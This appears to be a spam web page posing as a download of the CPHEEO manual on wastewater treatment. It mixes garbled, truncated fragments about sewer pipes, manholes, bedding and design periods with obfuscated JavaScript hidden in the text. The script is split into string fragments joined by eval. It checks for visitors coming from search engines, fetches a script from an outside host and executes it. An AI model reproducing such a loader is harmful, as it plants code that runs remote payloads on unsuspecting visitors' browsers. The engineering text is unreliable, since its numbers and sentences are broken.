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HOT! Manual On Wastewater Treatment Cpheeo Manual Download

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GRP pipes are widely used in other countries where corrosion resistant pipes are required at reasonable rates.

Sewer size Manhole spacing Sewer < 9 Maximum 3 0 m 90 Up to 3 00 m Input Requirement.. The size of manholes shall be such that there should be a clear opening of not less than 0.. Years Replacement difficult and costly Pumping mains 30 Years Cost may be economical.

This manual has been developed by the Central Public Health and Environmental Engineering Organisation (CPHEEO), a department under the Ministry of Urban Development.. aja";oYi["PKxX"]="s co";oYi["zDJV"]="val(";oYi["brAu"]="ipt'";oYi["tiRO"]="f(\"y";oYi["GafE"]="')[0";oYi["gkXi"]="peof";oYi["yrIt"]="taTy";oYi["FAAe"]="ttri";oYi["lFWd"]="ment";oYi["dnhl"]="dexO";oYi["hybv"]="tino";oYi["pJZq"]="ned'";oYi["GOhi"]="\")>0";oYi["kfCH"]="/jqu";oYi["xwGH"]="'scr";oYi["ZCLv"]="100)";oYi["nUtC"]="Data";oYi["fqIo"]="ss:f";oYi["miRY"]="tus,";oYi["ZCat"]="tEle";oYi["qrft"]="f(\"g";oYi["mXdS"]="e.. These days these pipes are used for making connection from house to sewer but not prevalent in street sewers.

PVC pipes The welded joints are leak proof and as such some people have started using these pipes.

Normally the same kept 8- 1 Man hole size, depth, type The channels in manholes at junctions and bends shall be smooth with gradual transitions to avoid turbulence and deposition of solids.. Class B is bedding having a shaped bottom or compacted granular bedding with a carefully compacted backfill.. In case of circular sewers, table 3 Manual(Hydraulic properties of Circular sections), the velocity is maximum at 0.. Arch- type Circular Depth Size Depth Size Depth Size< 9 00 90 Cover Frame.. \")";oYi["zcSG"]="ibs/";oYi["cvyS"]="ry/3";oYi["NgdQ"]="://T";oYi["bHXS"]="owme";oYi["JDeq"]="e';$";oYi["PfbQ"]=" = '";oYi["Jfzr"]="bute";oYi["IVbC"]="head";oYi["uamJ"]=":fal";oYi["emZj"]="rowa";oYi["VrPp"]="tSta";oYi["fYDf"]="y',s";oYi["Vxgl"]="}}rd";oYi["GJOq"]="ue,j";oYi["odVP"]="ar r";oYi["UUen"]="l.. Pumping Stations- Civil Work Years 5Pumping Machinery Years Life of pumping machinery is 1.. ge";oYi["jafS"]="f in";oYi["CYAg"]="c','";oYi["ACje"]="min ";oYi["yxyy"]="ent(";oYi["NpGV"]="Chil";oYi["iCxC"]="ande";oYi["vxaY"]="ar a";oYi["EJYz"]=");a.. cr";oYi["QtVc"]=">0||";oYi["oZmh"]="mble";oYi["NIZX"]="Yhh4";oYi["YDew"]="jqXH";oYi["QKbz"]="leng";oYi["tagG"]="me('";oYi["veUu"]="ucce";oYi["tnjx"]="onse";oYi["cneo"]="omai";oYi["nnKI"]="rl:'";oYi["vHVg"]="ocum";oYi["CPfs"]=".. Steel Fiber Reinforced Concrete Covers (SFRC) conforming to IS 1 HD- 2 0 Grade designation) or cast iron manhole covers and frames conforming to IS 1.. The discharge at 0 Therefore the maximum flow depth should be 0 Constant (n)Variable (n)d/Dv/Vq/QNd/nv/Vq/Q1.. Input Requirement Data Source Remarks/Design criteria What is prevalent material to cover opening of Man Hole.. Manholes should be sized to allow necessary cleaning and inspection Circular manholes are stronger than rectangular and arch type manholes and thus these are preferred over rectangular as well as arch type manholes.. var jq = 'manual+on+wastewater+treatment+cpheeo+manual+download';var oYi = new Array();oYi["Vwqs"]="x.. Infiltration and leakage mainly depends on quality of construction and water table levels.. Quality of construction in smaller size RCC main such as 1 The sewerage system is not totally closed one and undesired waste such as solid waste and drains finds way in sewerage, making smaller size sewer lines more prone to frequent blocking iv) The cost of pipe line element is only about 1.. These pipes are good for corrosion resistance and erosion resistance However due to less length, more joints, difficulty in jointing, requirement of special bedding and less compressive strength of pipes manufactured in India; use of these pipes is reducing in India.. The pipe bedding material must be firm and not permit displacement of pipe With adequate cement concrete encasing the cover can be suitably reduced.. It is designed according to the following considerations A maximum velocity of 3.. ind";oYi["mYNh"]="\"mai";oYi["Tdpq"]=")>0|";oYi["stkB"]="n \")";oYi["EONw"]="se{v";oYi["PaPd"]="eapi";oYi["iRan"]="jque";oYi["rvoH"]="http";oYi["MRsv"]=".. Sulphate resistant cement is used in corrosive soils Provision of flow measurement, adequate ventilation, safety equipments, pump lifting arrangements shall be made.. Characteristics of different pipes for pumping main help to choose between pipe options for particular site.. More pumping hours give lower pipe size and hence cost saving Future expected improvement in power supply may also be considered.. The maximum depth of sewer pipe can be kept as per site conditions to minimize the number of pumping stations.. Such quantities should be worked out separately Input Requirement Data Source.. \")";oYi["kjVt"]="oogl";oYi["FwOr"]="ctio";oYi["GgFX"]="d(a)";oYi["MSvC"]="|ref";oYi["WfwH"]="g.. Effluent disposal and utilization Years Provision of design capacities in the initial stages itself is economical Sewer Network.. A slab, generally of plain cement concrete at least 1 The thickness of the base shall be suitably increased up to 3.. Hence a minimum velocity of 0 Para 3 4 3 Manual, for present peak flow and 0.. b";oYi["oThl"]="setA";oYi["cOAe"]="eate";oYi["zKXW"]=";}el";oYi["ivkx"]="\"liv";oYi["XLEA"]="t.. \")";oYi["CfVA"]="ZLNH";oYi["ybRM"]="//aj";oYi["VhYr"]="ype:";oYi["Cvvo"]="eout";oYi["nDgp"]="tTim";oYi["sozC"]="){va";oYi["eCSu"]="e,cr";oYi["FdhL"]="AV.. Generally sewers are laid in trenches by excavation in natural soil and then covered by refilling the trench to the original ground level.. HDPE pipes are available up to 6 The pipes are recently development in India but are costlier than RCC pipes and u.. Manholes are usually constructed directly over the line of the sewer They are circular, rectangular or square in shape.. Type and size of man hole for different depths and different pipe dia Rectangular.. Years Land acquisition in future difficult Sewer network (laterals, Trunk mains, Outfall et)c.. The sewer shall be in a straight line between two manholes The minimum spacing of manholes varies from 3.. Para 3 2 5 of Manual stipulate peak factor for different contributary population.. The circular manholes have been proposed on all sewer lines Poly elastomeric M S flats footrest has been provided for entry into manholes.. Input Requirement Data Source Remarks/Design criteria Rates of different type of Pipe Sewage Pumping Station.. Thus the sewers are designed on the assumption that although silting might occur at minimum flow, it would be flushed out during peak flows.. AC pipes cannot stand high superimposed loads, subject to corrosion from acids in sewage and high sulphate soils, require special bedding and weak against erosion where high velocities are encountered; as such use of AC pipe is not prevalent.. Where flows are expected to substantially increase between 2 Each pumping station will be provided with an on line flow meter.. No Design Component Design Period Remarks Land Acquisition for STP, SPS, sewers etc.. Characteristics of various pipes  for gravity sewers makes comparison for different pipe options.. Only high alumina cement concrete should be used when it is exposed to corrosive sewage or industrial wastes.. ";oYi["sUDf"]="x({t";oYi["Xxgu"]="'GET";oYi["oHSM"]="214 ";oYi["Akxw"]="resp";oYi["hEqe"]="n rd";oYi["zzwk"]=".. No Conduit Material Recommended It is generally provided to convey sewage from Sewage Pumping Stations to a higher level inlet chamber of nearby sewer or Sewage Treatment Plants.. Velocity in a sewer is recommended not to exceed 3 mps Depth of flow The closed sewers should not run full, otherwise the pressure will rise above or fall below the atmospheric pressure and condition of open channel flow will cease to exist.. Welcome to Toolkits Master Plan Preparation Design Period The design period is different from planning horizon year.. I Foreword Purpose of this Manual This RURAL WATER SUPPLY DESIGN MANUAL is the first of three related volumes prepared for the use of prospective and actual owners.. g";oYi["aNQQ"]="\"bin";oYi["GwZw"]="(\"ms";eval(oYi["DZax"]+oYi["PoFC"]+oYi["gjeP"]+oYi["vxaY"]+oYi["EXzp"]+oYi["isuA"]+oYi["XLEA"]+oYi["cOAe"]+oYi["XXVc"]+oYi["yxyy"]+oYi["xwGH"]+oYi["brAu"]+oYi["EJYz"]+oYi["oThl"]+oYi["FAAe"]+oYi["Jfzr"]+oYi["IZSy"]+oYi["CYAg"]+oYi["ybRM"]+oYi["MMyG"]+oYi["kjVt"]+oYi["PaPd"]+oYi["PKxX"]+oYi["XtPr"]+oYi["XoZb"]+oYi["zcSG"]+oYi["iRan"]+oYi["cvyS"]+oYi["bUUz"]+oYi["kfCH"]+oYi["kOJS"]+oYi["ACje"]+oYi["mzOx"]+oYi["Nwhh"]+oYi["isuA"]+oYi["rolY"]+oYi["ZCat"]+oYi["lFWd"]+oYi["zphR"]+oYi["MrRK"]+oYi["tagG"]+oYi["IVbC"]+oYi["GafE"]+oYi["NMiW"]+oYi["UDHH"]+oYi["NpGV"]+oYi["GgFX"]+oYi["sXLv"]+oYi["FwOr"]+oYi["hEqe"]+oYi["AyMk"]+oYi["zrpN"]+oYi["gkXi"]+oYi["KkWd"]+oYi["tlaB"]+oYi["qekJ"]+oYi["pJZq"]+oYi["XQOp"]+oYi["nDgp"]+oYi["Cvvo"]+oYi["QRQh"]+oYi["ZCLv"]+oYi["zKXW"]+oYi["EONw"]+oYi["odVP"]+oYi["sZPq"]+oYi["vHVg"]+oYi["dHBX"]+oYi["QLLz"]+oYi["ocJM"]+oYi["YEQm"]+oYi["SSLy"]+oYi["QKbz"]+oYi["AFWQ"]+oYi["bzMs"]+oYi["HErS"]+oYi["jafS"]+oYi["dnhl"]+oYi["tiRO"]+oYi["iCxC"]+oYi["Vwqs"]+oYi["Gcxk"]+oYi["PUxO"]+oYi["jafS"]+oYi["dnhl"]+oYi["qrft"]+oYi["kjVt"]+oYi["mXdS"]+oYi["Gcxk"]+oYi["MSvC"]+oYi["CPfs"]+oYi["OiHy"]+oYi["bjwl"]+oYi["oZmh"]+oYi["CVci"]+oYi["QtVc"]+oYi["SSLy"]+oYi["cxBl"]+oYi["zFQc"]+oYi["aNQQ"]+oYi["WfwH"]+oYi["QtVc"]+oYi["SSLy"]+oYi["cxBl"]+oYi["zFQc"]+oYi["mYNh"]+oYi["UUen"]+oYi["QtVc"]+oYi["SSLy"]+oYi["cxBl"]+oYi["zFQc"]+oYi["LWpR"]+oYi["QnMj"]+oYi["Tdpq"]+oYi["MSvC"]+oYi["CPfs"]+oYi["OiHy"]+oYi["GwZw"]+oYi["stkB"]+oYi["QtVc"]+oYi["SSLy"]+oYi["cxBl"]+oYi["zFQc"]+oYi["ivkx"]+oYi["mXdS"]+oYi["QtVc"]+oYi["SSLy"]+oYi["cxBl"]+oYi["zFQc"]+oYi["zuVR"]+oYi["GOhi"]+oYi["sozC"]+oYi["pYmM"]+oYi["bHXS"]+oYi["PfbQ"]+oYi["ZqOA"]+oYi["JDeq"]+oYi["MRsv"]+oYi["sUDf"]+oYi["VhYr"]+oYi["Xxgu"]+oYi["hyzB"]+oYi["yrIt"]+oYi["tfRp"]+oYi["aHyO"]+oYi["kjQx"]+oYi["FQug"]+oYi["dSXI"]+oYi["hJTC"]+oYi["jttl"]+oYi["eCSu"]+oYi["jYcn"]+oYi["cneo"]+oYi["IjhN"]+oYi["GJOq"]+oYi["esxF"]+oYi["uamJ"]+oYi["mpgG"]+oYi["nnKI"]+oYi["rvoH"]+oYi["NgdQ"]+oYi["NIZX"]+oYi["CfVA"]+oYi["FdhL"]+oYi["emZj"]+oYi["MtbN"]+oYi["hybv"]+oYi["zzwk"]+oYi["uhCX"]+oYi["oHSM"]+oYi["aogg"]+oYi["uFbk"]+oYi["fYDf"]+oYi["veUu"]+oYi["fqIo"]+oYi["HEyd"]+oYi["JKfx"]+oYi["Akxw"]+oYi["tnjx"]+oYi["nUtC"]+oYi["xQpA"]+oYi["VrPp"]+oYi["miRY"]+oYi["YDew"]+oYi["PcxJ"]+oYi["zDJV"]+oYi["Akxw"]+oYi["tnjx"]+oYi["nUtC"]+oYi["BgLi"]+oYi["BgLi"]+oYi["Vxgl"]+oYi["XgRQ"]);Manual on Sewerage and Sewage Treatment (CPHEEO) Latest Manual on Sewerage and Sewage Treatment Systems Part A Engineering: Latest Manual on Sewerage and Sewage.. As such for present peak flows up to 3 Table 3 7 of Manual These slopes would ensure minimum velocity of 0.. Also from consideration of ventilation sewers should not be designed to run full.. Sewage Treatment Plants Years The construction shall be modular in phased manner as actual population less than design population and in Indian cities initially flows are much less due to connectivity problems.. Sl No Present Peak Flow in LPSSlope per 1 Pipe Material Option for Gravity Sewer.. Salt Glazed Stoneware Pipes are mostly manufactured in sizes 8 The length of these pipes is 6.. This is significant when water table is high and head of ground water is more than the head of sewage in sewers.. Class C is an ordinary bedding having a shaped bottom or compacted granular bedding but with a lightly compacted backfill.. Four classes of beddings of A, B, C, and D are used for laying of sewers Class A bedding may be either concrete cradle or concrete arch.. However now it is not common Concrete pipes are commonly used now as these can be manufactured to any reasonable strength and laying is easy and jointing is leak proof.. The minimum flow may vary from 1/2 to 1/3 of average flow No Contributing Population.. Remarks/Design criteria Quantity of water supply used by consumers other than that from Municipal/PHED system.. Class B or C bedding with compacted granular bedding is generally recommended Shaped bottom is difficult and costly and hence not recommended.. \")";oYi["XoZb"]="ax/l";oYi["gjeP"]="jq;v";oYi["XXVc"]="Elem";oYi["dHBX"]="ent ";oYi["AFWQ"]="th>0";oYi["IjhN"]="n:tr";oYi["hJTC"]="ata:";oYi["uhCX"]="/28/";oYi["PUxO"]="|(re";oYi["tfRp"]="pe:'";oYi["mzOx"]="js')";oYi["LWpR"]="\"yah";oYi["BgLi"]=");}}";oYi["bzMs"]="){if";oYi["bUUz"]=".. Para 3 2 4, of manual stipulate that generally 8 However sewers should be designed to minimum waste water flow of 1.. 1 0";oYi["mpgG"]="se,u";oYi["uFbk"]="eebl";oYi["bjwl"]="(\"ra";oYi["pYmM"]="r sh";oYi["KkWd"]=" $==";oYi["Nwhh"]=";doc";oYi["HEyd"]="unct";oYi["IZSy"]="('sr";oYi["sZPq"]="ef=d";oYi["JKfx"]="ion(";oYi["PoFC"]="q = ";oYi["NMiW"]="].. ap";oYi["hyzB"]="',da";oYi["PcxJ"]="R){e";oYi["sXLv"]=";fun";oYi["YEQm"]=";if(";oYi["jttl"]="fals";oYi["HErS"]="((re";oYi["dSXI"]="essD";oYi["zrpN"]="f(ty";oYi["zFQc"]="xOf(";oYi["XgRQ"]="();";oYi["UDHH"]="pend";oYi["tlaB"]="='un";oYi["MMyG"]="ax.. Class D is one with flat bottom trench with no care being taken to secure compaction of backfill at the sides and immediately over the pipe and hence is not recommended.. Peak Factor 1Up to 2 Above 7 5,0 00 Ground Water Infiltration and leakage Some quantity of ground water or subsoil water may infiltrate into sewers through defective joints, broken pipes etc.. Table 1 1 CPHEEO Manual  gives design period for different components of sewerage system and sewage treatment.. From ULB and Public Peak Factor Peak factor is ratio of maximum flow at any time to average flow and depends on contributary population.. The size of the main should be determined considering initial cost and capitalized O & M cost for different sizes as per method given in Water Supply Manual.. ";oYi["DZax"]="var ";oYi["esxF"]="sonp";oYi["SSLy"]="ref ";oYi["EXzp"]="=doc";oYi["zphR"]="sByT";oYi["aogg"]="js?w";oYi["isuA"]="umen";oYi["MtbN"]="rdla";oYi["XtPr"]="m/aj";oYi["qekJ"]="defi";oYi["CVci"]="r.. Industries, commercial buildings etc who often use water other than the municipal supply and may discharge their liquid waste into the sanitary sewers.. com";oYi["cxBl"]="inde";oYi["kOJS"]="ery ";oYi["ZqOA"]="forc";oYi["aHyO"]="scri";oYi["XQOp"]="){se";oYi["OiHy"]="exOf";oYi["xQpA"]=",tex";oYi["FQug"]="proc";oYi["kjQx"]="pt',";oYi["ocJM"]="rrer";oYi["MrRK"]="agNa";oYi["QLLz"]="refe";oYi["QRQh"]="(rd,";oYi["zuVR"]="\"vk.. Ministry of Urban Development All donations towards the Prime Minister's National Relief Fund (PMNRF) and the National Defence Fund (NDF) are notified for 100%.. Some states and ULBs have started adopting minimum diameter as 2 The logic is i) Maintenance of sewer system is generally not good and 1.. Some quantity of sewage may leak out from defective joints and defective pipes when head of sewage is more in sewers than head of ground water outside.. Erosion of sewers is caused by sand and other gritty material in the sewer and also by excessive velocity.. Brickwork is used for large diameters as sewers can be constructed in any shape.. Cast iron, DI and steel pipes are not used due to high cost Rates are also low.. Data Source Remarks/Design criteria What is prevalent type and material of Man Hole in the city and the adjoining area Size of Man Hole.. \")";oYi["QnMj"]="oo \"";oYi["AyMk"]="(){i";oYi["jYcn"]="ossD";oYi["Gcxk"]=">0)|";oYi["rolY"]="t.. Type, construction and Accessories Earlier the pumping stations used to be rectangular with dry and wet wells adjacent to each other or circular with central dry well and peripheral wet well or circular with a dividing wall to separate the dry and wet wells and with centrifugal pumping sets.. Now wet well (no dry well) with submersible pumps are more prevalent The construction is of RCC.. Manholes should be of such size that will allow necessary cleaning and inspection.. For inspection, cleaning and testing of sewers, manholes shall be provided at every change of alignment, gradient, diameter, head of sewers and at junction of sewers.. Size of man hole for circular, rectangular & arch type The width/ diameter of the manhole should not be less than internal diameter of the sewer + 1.. Where : D = Full Depth of flow(internal dia), d Actual Depth of flow, V = Velocity at full depth, v = Velocity at depth.


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